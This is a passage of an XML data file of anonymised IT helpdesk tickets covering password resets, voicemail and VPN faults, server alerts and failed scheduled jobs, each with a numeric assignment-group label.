    <s v="need erp password reset. i am getting the error when logging into engineering tool that i have attempted to many times with the wrong password (old password)."/>
    <s v="ewztnhig boixplft"/>
    <x v="0"/>
  </r>
  <r>
    <s v="a supplier told me that i have no warehouse_toolmail (x5380).  matheywt kaufsfthyman is also having the same problem (x4465)"/>
    <s v="koiapqbg teyldpkw, matheywt kaufsfthyman , phone system warehouse_toolmail"/>
    <s v="koiapqbg teyldpkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="desk phone warehouse_toolmail"/>
    <s v="when accessing my warehouse_toolmail, i receive a busy signal.  the red warehouse_toolmail light is activated on my phone, when i push the button a busy signal is received._x000d__x000a__x000d__x000a_others are having the same issues.  "/>
    <s v="tsicojkp kghaozew"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="psgqitwu ribvmtfk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="delivery failures"/>
    <s v="date of email: 07/20/2016 (i have attached both email, the one i sent and was not delivered and the other i have received with the delivery error message)_x000d__x000a_sender's name: uidgt olibercsu (kbnfxpsy.gehxzayq@gmail.com)_x000d__x000a_recipient if not caller: jgnxyahz cixzwuyf (jgnxyahz.cixzwuyf@gmail.com)_x000d__x000a_delivery failure code: 0x9115121f-0x9115121f-0x000501_x000d__x000a_delivery failure text:sua mensagem nÃ£o foi recebida por um ou mais dos destinatÃ¡rios._x000d__x000a__x000d__x000a_      assunto: enc: curso: &quot;customer logistics services (cls)&quot;_x000d__x000a_      enviada em: 20/07/2016 19:56_x000d__x000a__x000d__x000a_nÃ£o Ã© possÃ­vel encontrar os seguintes destinatÃ¡rios:_x000d__x000a__x000d__x000a_      jgnxyahz cixzwuyf em 20/07/2016 19:56_x000d__x000a_            esta mensagem nÃ£o pÃ´de ser enviada. tente enviar a mensagem novamente mais tarde ou contate o administrador da rede. o erro a operaÃ§Ã£o do cliente falhou. Ã© [0x9115121f-0x9115121f-0x000501]._x000d__x000a_"/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="26"/>
  </r>
  <r>
    <s v="access database error."/>
    <s v="access database error. attached."/>
    <s v="acmglkti cwgxrabu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="ycdfqokg jxohikdz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1132: average (5 samples) memory usage is now 95%, which is above the error threshold (95%)"/>
    <s v="HostName_1132: average (5 samples) memory usage is now 95%, which is above the error threshold (95%)_x000d__x000a_                      swap memory usage is now 90.80%, which is above the warning threshold (75%)"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="my telephone does not have a dial tone and i cannot pick up warehouse_tool mail messages"/>
    <s v="my telephone does not have a dial tone and i cannot pick up warehouse_tool mail messages"/>
    <s v="dzjxrkae grqczsmx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account lockout"/>
    <s v="account lockout"/>
    <s v="qifzkoej etbmgjvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i am having issues with being disconnected every few minutes from outlook, i cannot send or recive email or search when "/>
    <s v="i am having issues with being disconnected every few minutes from outlook, i cannot send or receive email or search when it disconnects."/>
    <s v="hitakmbs fvhmkntq"/>
    <x v="2"/>
  </r>
  <r>
    <s v="restore"/>
    <s v="_x000d__x000a__x000d__x000a_received from: trgqbeax.hfyzudql@gmail.com_x000d__x000a__x000d__x000a_please restore from august 5th 2016_x000d__x000a__x000d__x000a_westes$(\\HostName_598&lt;file:///\\HostName_598&gt;) / betriebliche regelungen und bv / bv / anlage 2a bv bonus im ad fy17.docx_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_danke + viele grÃ¼ÃŸe_x000d__x000a_trgqbeax hfyzudql_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen |  best "/>
    <s v="trgqbeax hfyzudql"/>
    <x v="11"/>
  </r>
  <r>
    <s v="o outloock nÃ£o esta funcionando."/>
    <s v="mensagem de erro:&quot; infelizmente, o outlook encontrou um erro que o estÃ¡ impedindo de funcionar corretamente. como resultado, outlook deverÃ¡ ser fechado. gostaria que fizÃ©ssemos o reparo agora? com trÃªs botÃµes que sÃ£o: reparar agora/ fechar/ ajuda&quot;"/>
    <s v="jidhewlg jufskody"/>
    <x v="62"/>
  </r>
  <r>
    <s v="warehouse_toolmail not working"/>
    <s v="my warehouse_toolmail does not seem to be picking up incoming calls.  my number is 724.  i attempted to uacyltoe hxgaycze this by calling from my cell phone.  after 10 rings, the warehouse_toolmail still did not pick up."/>
    <s v="wgothrzl iokdftgn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="setting of ooo for another mail box"/>
    <s v="setting of ooo for another mail box_x000a_summary:need out off office for an employee who does not work in company any longer"/>
    <s v="utrvshcp bjlwcovt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user hajghtdul unable to connect via vpn. unable to access distributor_tool and distributor_tool qa."/>
    <s v="i have changed my passwords using password_management_tool password manager. after the passwords change i am unable to connect via vpn _x000d__x000a_my user id is hajghtdul."/>
    <s v="wibovsru ulmqyhsk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="warehouse_toolmail not possible on phone set"/>
    <s v="warehouse_toolmail not possible on phone set"/>
    <s v="rwmeuzvy bpstvajw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="group by does not work in the new modern look  see attached image"/>
    <s v="my site does not show the grouping by the first level and at the second level is continuous._x000d__x000a_further, the expand arrows are not responsive._x000d__x000a_"/>
    <s v="gvxfymjk euioadyf"/>
    <x v="15"/>
  </r>
  <r>
    <s v="erp SID_34 unlock request "/>
    <s v="erp SID_34 unlock request "/>
    <s v="kslhobgj cyhvefna"/>
    <x v="0"/>
  </r>
  <r>
    <s v="update on inplant_848628"/>
    <s v="update on inplant_848628"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ldism004(usa village(claapdico)-robot) is inactive since 07:14 am et on 08/09"/>
    <s v="ldism004(usa village(claapdico)-robot) is inactive since 07:14 am et on 08/09"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="setup new ws \xaqzisrk ahbgjrqz"/>
    <s v="setup new ws \xaqzisrk ahbgjrqz"/>
    <s v="xaqzisrk ahbgjrqz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="warehouse_toolmail related to my office phone is not functioning."/>
    <s v="the warehouse_toolmail associated with my office phone is not functioning properly.  when trying to access warehouse_toolmail from my office phone, i receive a &quot;not possible&quot; message on my phone.  i have also tried to access warehouse_toolmail from the number and receive a message that states that my call cannot be completed at this time."/>
    <s v="htsnaodb adjtmlzn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="handheld wireless device activation iphone 5s"/>
    <s v="handheld wireless device activation iphone 5s"/>
    <s v="mfeyouli ndobtzpw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need file restored on a network/nt drive HostName_771"/>
    <s v="need file restored on a network/nt drive._x000d__x000a__x000d__x000a_1) what is the file's full pathname   techcenter projects_x000d__x000a__x000d__x000a_2) what server/drive is it on HostName_771_x000d__x000a__x000d__x000a__x000d__x000a_3) from what backup date or last modified date do you want the file restored ?  if unsure, the most recent backup date will be used. _x000d__x000a__x000d__x000a_4) do you want the entire folder restored ?  if not, you must provide the specific filename to restore . yes_x000d__x000a__x000d__x000a_5) if the backup tape is not onsite, is it ok to allow 1-2 business days to retrieve the offsite tape ?  extra charges apply for emergency delivery. _x000d__x000a__x000d__x000a_6) do you want this filename and/or folder restored to its original place and with its original name, in other words an overwrite will be done. _x000d__x000a_if not, then you need to supply the new name and location to restore it to. _x000d__x000a__x000d__x000a_note:  a 30-day maximum backup is available.  this is for file restores.  exception only being HostName_768 &amp; HostName_770, as they are kept for 1 year."/>
    <s v="nwqktzlx vnlqkgpb"/>
    <x v="4"/>
  </r>
  <r>
    <s v="need access for utislgov fetaqndw "/>
    <s v="_x000d__x000a__x000d__x000a_received from: zjawqgcs.tohqcxla@gmail.com_x000d__x000a__x000d__x000a_hi there,_x000d__x000a__x000d__x000a_we want give utislgov fetaqndw utislgov.fetaqndw@gmail.com&lt;mailto:utislgov.fetaqndw@gmail.com&gt; the same access as i have for \\HostName_1337\departments drive._x000d__x000a__x000d__x000a_"/>
    <s v="zjawqgcs tohqcxla"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unlock erp SID_34 erp production account"/>
    <s v="unlock erp SID_34 erp production account"/>
    <s v="vmidjaxk boarxyps"/>
    <x v="0"/>
  </r>
  <r>
    <s v="revisar pc lpaw8515845 (g0rfv12) usadtto dfsdpor ffthhiago frsilva"/>
    <s v="usar microsoft update _x000d__x000a_atualizar adobe acrobat, adobe flash e java_x000d__x000a_revisar grupos_x000d__x000a_revisar e atualizar sep_x000d__x000a_revisar patching_antivirus_sw_x000d__x000a_revisar erp client_x000d__x000a_executar check disk, defrag e scan do sep_x000d__x000a_atualizar drivers dell_x000d__x000a_verificar se hÃ¡ atualizaÃ§Ã£o/nova versÃ£o do pacote office no o365_x000d__x000a__x000d__x000a_uacyltoe hxgayczear acessos ao itau, caixa e hsbc. uacyltoe hxgayczear abertura de plaghynilhas do itaÃº.  "/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="62"/>
  </r>
  <r>
    <s v="seep installation "/>
    <s v="seep installation "/>
    <s v="ztrpuvdf jlahkmdv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issue on pricing in distributor_tool"/>
    <s v="we have agreed price with many of the distributors for a given period and skus.  this is specified through pricing condition zcnc in erp.  in distributor_tool, it is order through sold to &amp; ship to combination._x000d__x000a_-       till august â€“ flat rate deployment, we did not have any issues._x000d__x000a_-       today, when the distributor tried to book the order with zcnc pricing condition. the initial screen shows the correct price. but when the item is selected and quick order is clicked on, the price is getting changed to list price less standard discount instead of retaining the zcnc price."/>
    <s v="hbmwlprq ilfvyodx"/>
    <x v="21"/>
  </r>
  <r>
    <s v="outlook issue "/>
    <s v="outlook issue "/>
    <s v="wxnetroc yecbmliq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vvfrtgarnb  - account disabled : account needs to be enabled till 12th aug"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dctviemg.muapxkns@gmail.com_x000d__x000a__x000d__x000a_please enable bahbrgy' account aerp.  he is not leaving company until this friday.  i do not know why his account was disabled today._x000d__x000a__x000d__x000a_"/>
    <s v="dctviemg muapxkns"/>
    <x v="19"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="uerghtyi erzatqpy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account disabled for user vvfrtgarnb"/>
    <s v="account disabled for user vvfrtgarnb"/>
    <s v="kcnosyae zlpmfxgs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to wifi"/>
    <s v="unable to connect to wifi."/>
    <s v="csmhykge mpxbjudw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="close telephony_software between 16:30 and 17:30 local time due to kick off dinner"/>
    <s v="hi,_x000d__x000a_would you please close telephony_software for turkey between 16:30 and 17:30 local time due to kick off dinner? it was approved by djpwfxzt cfkwxlmq?_x000d__x000a_"/>
    <s v="lhycpqra fdhyxqrw"/>
    <x v="6"/>
  </r>
  <r>
    <s v="distributor_tool: company issue and engineering_tool issue "/>
    <s v="distributor_tool: company issue and engineering_tool issue "/>
    <s v="wipzvlug urmdkgpa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for wptbgchj jutpdcqf using password_management_tool password reset."/>
    <s v="the"/>
    <s v="wptbgchj jutpdcqf"/>
    <x v="16"/>
  </r>
  <r>
    <s v="unable to connect vpn"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zrpemyab.xvzwcbha@gmail.com_x000d__x000a__x000d__x000a_dear sir/madam,_x000d__x000a__x000d__x000a_i am unable to access vpn._x000d__x000a__x000d__x000a_please refer below message_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image003.jpg@01d1f26d.749a4780]_x000d__x000a__x000d__x000a_"/>
    <s v="zrpemyab xvzwcbha"/>
    <x v="0"/>
  </r>
  <r>
    <s v="my symantec management agent is disabled"/>
    <s v="my symantec management agent is disabled"/>
    <s v="yvjdluhk hmcpvtdj"/>
    <x v="49"/>
  </r>
  <r>
    <s v="npc311101328 maintain plant value tasks assigned to jimdghty beshryu. error  "/>
    <s v="npc311101328 information from jimdghty beshryu:  i have tried to complete the task.  i recruited the help of the usa planners who usually do that step.  they tell me that all of the tasks they do are complete with this item.  product engineering was able to complete their task that cannot be done (based on what i have been told) until the planners finish their task. "/>
    <s v="svuxizgr mkynswqd"/>
    <x v="10"/>
  </r>
  <r>
    <s v="display settings issue."/>
    <s v="display setting issue "/>
    <s v="ihozauxs ohdqmipz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="idg password reset not possible. "/>
    <s v="idg password reset not possible. _x000d__x000a_"/>
    <s v="xuymwdbn polhsczj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can't print drawing"/>
    <s v="when attempting to print 71877338 from eu locations, a &quot;missing sheet&quot; page is being printed._x000d__x000a__x000d__x000a_my guess is that although the drawing is in fr status, all originals still reside in cadb storage,"/>
    <s v="ctvaejbo mjcerqwo"/>
    <x v="10"/>
  </r>
  <r>
    <s v="i can not log into erp hcm via the vpn"/>
    <s v="i'm connected to the vpn, but i can not log into erp.  i keep getting the error message that seems to imply that i am not connected to the vpn.  any help is appreciated."/>
    <s v="mcjqespd ldwsmjgx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="attached mail is saved on desktop as template with a text and signature. but when sent, nothing is to be seen."/>
    <s v="attached mail is saved on desktop as template with a text and signature. but when sent, nothing is to be seen."/>
    <s v="anuxbyzg bvsqcjkw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client login"/>
    <s v="hi,_x000d__x000a__x000d__x000a_kindly help me out on access drawing search â€“ to view and download in business_client utility._x000d__x000a__x000d__x000a_"/>
    <s v="qxmujhwg rsgqidxw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_973:(hr_tool tax_interface app - qa ) total cpu is now 100.00%, since 4:51 am on 8/9 et "/>
    <s v="HostName_973:(hr_tool tax_interface app - qa ) total cpu is now 100.00% which is above the error threshold (99%)"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="bildschirm am kyocera arbeitsplatz defekt"/>
    <s v="bitte austauschen"/>
    <s v="wfbkucds qaxhbois"/>
    <x v="41"/>
  </r>
  <r>
    <s v="setup new ws \rxpjomyf hvolsgqn"/>
    <s v="setup new ws \rxpjomyf hvolsgqn"/>
    <s v="rxpjomyf hvolsgqn"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \pnwbkitv phbnwmkl"/>
    <s v="setup new ws \pnwbkitv phbnwmkl"/>
    <s v="pnwbkitv phbnwmkl"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \wyighrjl xcwavhyu"/>
    <s v="setup new ws \wyighrjl xcwavhyu"/>
    <s v="wyighrjl xcwavhyu"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup new ws \beosjgxt mdevcqjk"/>
    <s v="setup new ws \beosjgxt mdevcqjk"/>
    <s v="beosjgxt mdevcqjk"/>
    <x v="24"/>
  </r>
  <r>
    <s v="erp 730 issue."/>
    <s v="my erp gui  got updated today, after that  i am not able to save   any data  to  desktop.  please help."/>
    <s v="vazmgjxu nmsycblo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lhqsm518(fim production): miiserver.exe: wrong number of instances of process miiserver.exe."/>
    <s v="lhqsm518(fim production): miiserver.exe: wrong number of instances of process miiserver.exe, expected instances gte 1 but found 0_x000d__x000a_at time: 08/09/16 04:51:34 am, est"/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="11"/>
  </r>
  <r>
    <s v="erp SID_34 password reset request."/>
    <s v="erp SID_34 password reset request."/>
    <s v="apylmhrq gyncwpim"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company guest account not working which was created yesterday."/>
    <s v="company guest account not working which was created yesterday."/>
    <s v="miecoszw mhvbnodw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="user account is locked"/>
    <s v="unable to login windows."/>
    <s v="ecprjbod litmjwsy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to hear any thing "/>
    <s v="not able to hear any thing "/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation request for user :eqtofwbm mojfbwds : eqtofwbm.mojfbwds@gmail.com"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wauhocsk.vxuikqaf@gmail.com_x000d__x000a__x000d__x000a_dear friends_x000d__x000a__x000d__x000a_please find below enclosed request_x000d__x000a__x000d__x000a_"/>
    <s v="wauhocsk vxuikqaf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset request "/>
    <s v="erp SID_34 password reset request "/>
    <s v="xuymwdbn polhsczj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i cannot connect the network printer vh41"/>
    <s v="i cannot connect the network printer vh41"/>
    <s v="yvjdluhk hmcpvtdj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="updated win10 uacyltoe hxgaycze machine eaglt000500 with recent &quot;anniversary update&quot; - need lauacyltoe hxgaycze sep version 12.1.6 mp5 or higher"/>
    <s v="hello antivirus team,_x000d__x000a__x000d__x000a_my win10 uacyltoe hxgaycze machine eaglt000500 has automatically updated to the recent win10 &quot;anniversary update&quot; - sep 12.1.6 mp3 is no longer working._x000d__x000a_this is an official company it win10 uacyltoe hxgaycze machine._x000d__x000a__x000d__x000a_as per symantec technical support forum, windows 10 anniversary update requires at least sep version 12.1.6 mp5 or higher. please download and provide the software on the following share:_x000d__x000a__x000d__x000a_\\eagcldaten\public\roedel\symantec_endpoint_protection_x000d__x000a__x000d__x000a_"/>
    <s v="nwfoucba dzbujamc"/>
    <x v="49"/>
  </r>
  <r>
    <s v="mobile device activation ; personal device "/>
    <s v="mobile device activation ; personal device "/>
    <s v="vzogmube rnxwkfvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="data restore"/>
    <s v="restore the data files from external hard disk to reimaged laptop."/>
    <s v="xezjvnyr hmjwknxs"/>
    <x v="18"/>
  </r>
  <r>
    <s v="polycom realpresence destop&quot;"/>
    <s v="polycom software installation on desktop"/>
    <s v="zscohabw qorvugzf"/>
    <x v="18"/>
  </r>
  <r>
    <s v="ad locked out "/>
    <s v="ad locked out "/>
    <s v="ywfhcuki dajkmxcl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="eagw8111224 shows defective system files - reinstall with lauacyltoe hxgaycze fy17 win7_x64 image"/>
    <s v="eagw8111224 shows defective system files - reinstall with lauacyltoe hxgaycze fy17 win7_x64 image"/>
    <s v="jksgwdyi greuqxko"/>
    <x v="28"/>
  </r>
  <r>
    <s v="terminate action for suzjhmfa swmiynoz has completed."/>
    <s v="from: jusfrttin gtehdnyuerrf [mailto:system@hr_tool.com] _x000d__x000a_sent: tuesday, august 09, 2016 12:05 pm_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: rad - the terminate action for suzjhmfa swmiynoz has completed._x000d__x000a__x000d__x000a_hello , _x000d__x000a__x000d__x000a_a termination for suzjhmfa swmiynoz, 11172383, effective 07/30/2016  has been approved._x000d__x000a__x000d__x000a_click the link to view._x000d__x000a__x000d__x000a_"/>
    <s v="homsxpyw qgcsaymo"/>
    <x v="19"/>
  </r>
  <r>
    <s v="request you to reset my password of password_management_tool- could not login and reset my password ."/>
    <s v="request you to reset my password of password_management_tool  as soon as possible._x000d__x000a_ could not login and reset my password ."/>
    <s v="boirqctx bkijgqry"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for prgthyuulla ramdntythanjesh using password_management_tool password reset."/>
    <s v="the"/>
    <s v="boirqctx bkijgqry"/>
    <x v="16"/>
  </r>
  <r>
    <s v="reset passwords for prgthyuulla ramdntythanjesh using password_management_tool password reset."/>
    <s v="the"/>
    <s v="boirqctx bkijgqry"/>
    <x v="16"/>
  </r>
  <r>
    <s v="the terminate action for kjtqxroc taqekwrd has completed."/>
    <s v="from: jusfrttin gtehdnyuerrf [mailto:system@hr_tool.com] _x000d__x000a_sent: tuesday, august 09, 2016 11:25 am_x000d__x000a_to: nwfodmhc exurcwkm_x000d__x000a_subject: rad:the terminate action for kjtqxroc taqekwrd has completed._x000d__x000a__x000d__x000a_hello , _x000d__x000a__x000d__x000a_a termination for kjtqxroc taqekwrd, 11145798, effective 06/25/2016  has been approved._x000d__x000a__x000d__x000a_click the link to view._x000d__x000a__x000d__x000a_"/>
    <s v="homsxpyw qgcsaymo"/>
    <x v="19"/>
  </r>
  <r>
    <s v="logon to server HostName_583 not possible"/>
    <s v="logon to server HostName_583 not possible - server is in a loop at the welcome screen"/>
    <s v="smpijawb eawkpgqf"/>
    <x v="11"/>
  </r>
  <r>
    <s v="lean event"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ikerxqwz.prkyuitl@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_while forwarding     lean event  updation  , i find the mail is not being forwarded and some message is displayed ._x000d__x000a__x000d__x000a_please check and advise_x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1f231.a3024791]_x000d__x000a__x000d__x000a_"/>
    <s v="ikerxqwz prkyuitl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="aw: [ticket#2016080878000153] wg: po#4505612440"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qyndvmlw.imcvznow@gmail.com_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / with kind "/>
    <s v="qyndvmlw imcvznow"/>
    <x v="61"/>
  </r>
  <r>
    <s v="network outage, russia ru, company-russia-vpn-rtr(10.46.0.21) showing down since 12:59 am edt on 08/09/16 (no backup ckt.) "/>
    <s v="what type of outage:  _x____network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________12:59 am edt on 08/09/16______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____no___    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __no____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   __na______     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    _____na______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ___na____     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    _________________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ____yes____     (yes/no/na)    cert started  ?___na_____    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="uxgrdjfc kqxdjeov"/>
    <x v="7"/>
  </r>
  <r>
    <s v="emea files not processed as per schedule - check &amp; let us know the reasons.; please include mail notification."/>
    <s v="hi pradtheyp,_x000d__x000a__x000d__x000a_we have not received the production feed files for emea today. please check from your end and re-send the files to us._x000d__x000a__x000d__x000a_also, we would like to know whether it will be possible that an automatic notification is sent to the concerned people in case the extraction programdnty fails._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="rdfjsawg zpmxgdcw"/>
    <x v="71"/>
  </r>
  <r>
    <s v="purchasing mdm import manager did not work correctly"/>
    <s v="mapping was not possible anymore"/>
    <s v="rhinvtua aquyjfbs"/>
    <x v="29"/>
  </r>
  <r>
    <s v="unable to open sales orders attachments - save abap reports and can't view desktop attachments through erp"/>
    <s v="issue 1 - after erp update on 8.8.2016 (a system prompt, to fix the issue of SID_55 &amp; SID_50 log on)  i am unable to open/view sales order outlook email attachments (refer attachment download error) in va02,va03 and as per error if out look is closed &amp; try to open the attachment, system is prompting to install outlook 2010(refer outlook installation prompt) _x000d__x000a__x000d__x000a_issue 2 - excel file downloaded after running abap query, i am unable to save or save to computer._x000d__x000a__x000d__x000a_issue 3 -  unable to view files saved on desktops to attachÃ© them to sales order in va02/va03"/>
    <s v="hpmwliog kqtnfvrl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to send or receive email "/>
    <s v="unable to send or receive email "/>
    <s v="aqwdfvrb oiajztbq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wg: [ticket#2016080878000153] wg: po#4505612440"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tvmlrwkz.rsxftjep@gmail.com_x000d__x000a__x000d__x000a_hallo zusammen,_x000d__x000a__x000d__x000a_siehe nachstehenden email schriftverkehr, bitte scghhnellstens beheben._x000d__x000a_danke._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="tvmlrwkz rsxftjep"/>
    <x v="61"/>
  </r>
  <r>
    <s v="not able to access attendance_tool application - ticket reference ticket_no0428293"/>
    <s v="name:aryndruh_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:wjbtlxry.gdbqzjyw@gmail.com_x000a_customer number:_x000a_telephone:+91 _x000a_summary:not able to access attendance_tool application - ticket reference ticket_no1539304_x000a_"/>
    <s v="wjbtlxry gdbqzjyw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bios einstellung"/>
    <s v="bitte an wzs 60 (wza, m14, m12.18990) bios so Ã¤ndern das nach netz reset der rechner selbststÃ¤ndig startet._x000a_bitte um erledigung durch m. himghtmelreich."/>
    <s v="zxopwyak zrbfkimx"/>
    <x v="32"/>
  </r>
  <r>
    <s v="networking issue at customer site"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vkzwibco.pueyvhoi@gmail.com_x000d__x000a__x000d__x000a_dear ms. ragsbdhryu,_x000d__x000a__x000d__x000a_in-line with our telephonic conversation, please find below the following details_x000d__x000a__x000d__x000a__x000d__x000a_1)      there are two computers â€“ machine pc and a laptop_x000d__x000a__x000d__x000a_2)      these two are connected using a lan cable_x000d__x000a__x000d__x000a_3)      the name of the laptop is visible in the 'my networks' page of machine pc_x000d__x000a__x000d__x000a_4)      but, the name of the machine pc is not visible in the network of the laptop_x000d__x000a__x000d__x000a_5)      we are unable to set the domain name and workgroup in settings of control panel_x000d__x000a__x000d__x000a__x000d__x000a_please sort this out on priority._x000d__x000a__x000d__x000a_"/>
    <s v="vkzwibco pueyvhoi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="call routing to german support agents"/>
    <s v="call routing to german support agents was fixed once the workgroup was added and percent allocated"/>
    <s v="fdmaluyo tvecikxn"/>
    <x v="6"/>
  </r>
  <r>
    <s v="frequent account lockouts"/>
    <s v="frequent account lockouts_x000a_contact no:- _x000a_chg1144616_x000a_ctask0026859"/>
    <s v="ymepzlno eobardlm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="windows account locked "/>
    <s v="windows account locked "/>
    <s v="lwuhfjsq ltanywzq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1142"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_1142 at 08/09/16 00:07:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="8"/>
  </r>
  <r>
    <s v="internet explorer"/>
    <s v="_x000d__x000a__x000d__x000a_received from: peojqgvm.qayeptuo@gmail.com_x000d__x000a__x000d__x000a_i need help installing the lauacyltoe hxgaycze internet explorer._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="peojqgvm qayeptuo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp access issue"/>
    <s v="system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34_x000a__x000a_enter user id of user having the issue: user hghjnlabel in locked  we needs to release user or reset password _x000a__x000a_transaction code(s) the user needs or was working with:_x000a__x000a_describe the issue:_x000a__x000a_if you are getting a &quot;not authorized&quot; message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000a__x000a_provide access the same as this other user:"/>
    <s v="tlowkghn jcefuzit"/>
    <x v="19"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_549"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: Job_549 at 08/08/16 23:22:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bkwin_search_server_prod_daily"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bkwin_search_server_prod_daily at 08/08/16 23:16:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: SID_50filesys"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: SID_50filesys at 08/08/16 23:03:25"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="7"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: Job_1305"/>
